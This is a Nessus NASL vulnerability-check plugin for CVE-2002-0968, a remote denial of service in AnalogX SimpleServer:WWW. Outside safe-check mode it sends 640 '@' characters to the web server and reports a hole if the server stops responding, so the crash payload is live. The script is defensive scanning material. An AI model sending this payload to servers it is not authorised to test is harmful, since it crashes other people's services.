#
# This script was written by Michel Arboi <arboi@alussinan.org>
#
# GNU Public Licence...
#
# Rerefence:
# To: bugtraq@securityfocus.com
# From:"Fort _" <fort@linuxmail.org>
# Subject: Remote DoS in AnalogX SimpleServer:www 1.16
# Message-ID: <20020613122121.31625.qmail@mail.securityfocus.com>
#

if(description)
{
 script_id(11035);
 script_bugtraq_id(5006);
 script_version("$Revision: 6219 $");
 script_cve_id("CVE-2002-0968");
 script_name("AnalogX SimpleServer:WWW  DoS");
 
 desc = "
It was possible to kill the remote web server by sending 640 @ 
character to it.

A cracker may use this flaw to make your server crash continuously, 
preventing it from working properly.

Solution : upgrade your software or use another
HTTP server.

Risk factor : High";


 script_description(desc);
 
 summary = "Crashes SimpleServer:WWW";
 script_summary(summary);
 
 script_category(ACT_MIXED_ATTACK);
 
 
 script_copyright("This script is Copyright (C) 2002 Michel Arboi");
 family = "Denial of Service";
 script_family(family);
 script_dependencies("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_require_keys("www/simpleserver");
 exit(0);
}

# The script code starts here

include("http_func.inc");

port = get_http_port(default:80);

if(!get_port_state(port)) exit(0);

banner = get_http_banner(port: port);
if (! banner) exit(0);
if(!egrep(pattern:"^Server: *SimpleServer:WWW", string:banner))exit(0);

if (safe_checks())
{
  if (egrep(pattern:"^Server: *SimpleServer:WWW/1.[01]", string:banner))
  {
    security_hole(port: port, data:"According ot its version number, 
it should be possible to kill your remote SimpleServer web server 
by sending 640 @ character to it.

A cracker may use this flaw to make your server crash continuously, 
preventing it from working properly.

Solution : upgrade your software or use another
HTTP server.

Risk factor : High");
   }
  exit(0);
}

soc = open_sock_tcp(port);
if(!soc) exit(0);

send(socket:soc, data:string(crap(length:640, data:"@"), "\r\n\r\n"));
r = http_recv(socket:soc);
close(soc);

soc = open_sock_tcp(port);
if(soc) { close(soc); exit(0); }

security_hole(port);
